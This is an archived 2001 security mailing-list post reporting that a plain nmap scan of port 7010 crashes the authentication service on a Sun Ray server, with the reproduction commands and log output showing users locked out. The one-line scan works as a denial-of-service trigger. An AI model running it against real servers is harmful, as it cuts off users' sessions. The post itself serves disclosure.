Again: Possible DoS attack against Sun Ray Servers?

From: Hanspeter Schmid (hpsat_private)
Date: Thu Dec 13 2001 - 22:45:26 PST

Next message: Cedric Blancher: "Re: iptables 'new but not syn' packets"

Previous message: Ron DuFresne: "Re: possible su local D.o.S"
Next in thread: Chatfield, Randy: "RE: Again: Possible DoS attack against Sun Ray Servers?"
Reply: Chatfield, Randy: "RE: Again: Possible DoS attack against Sun Ray Servers?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I have used a patch-reboot cycle to make an experiment.

A simple

  nmap -p 7010 brnray

is sufficient to shut down port 7010 of my SunRay server
brnray for good.

This concerns SunRay server software 1.3 on Solaris 8,
with, maybe, almost the latest patches.

Hanspi


P.S. A small protocol.  I worked on brnfire; brnray is the SunRay server

brnfire> telnet brnray 7010

> status

[[[output O.K.]]]

brnfire> nmap -p 7010 brnray

--- log entries

Dec 14 07:21:09 brnfire sudo: [ID 850335 local2.notice]      hps :
TTY=pts/16 ; PWD=/home/hps ; USER=root ; COMMAND=/usr/sepp/bin/nmap -p 7010
brnray
Dec 14 07:21:09 brnray utauthd: [ID 250799 user.info] CallBack0 UNEXPECTED:
Cannot accept on socket: java.net.SocketException: Software caused
connection abort

----

brnfire> telnet brnray 7010

[[[session hangs]]]

[[[From this point on, users cannot log in anymore, and users
   that are already logged in may lose their sessions.]]]

Next message: Cedric Blancher: "Re: iptables 'new but not syn' packets"
Previous message: Ron DuFresne: "Re: possible su local D.o.S"
Next in thread: Chatfield, Randy: "RE: Again: Possible DoS attack against Sun Ray Servers?"
Reply: Chatfield, Randy: "RE: Again: Possible DoS attack against Sun Ray Servers?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Dec 13 2001 - 22:55:26 PST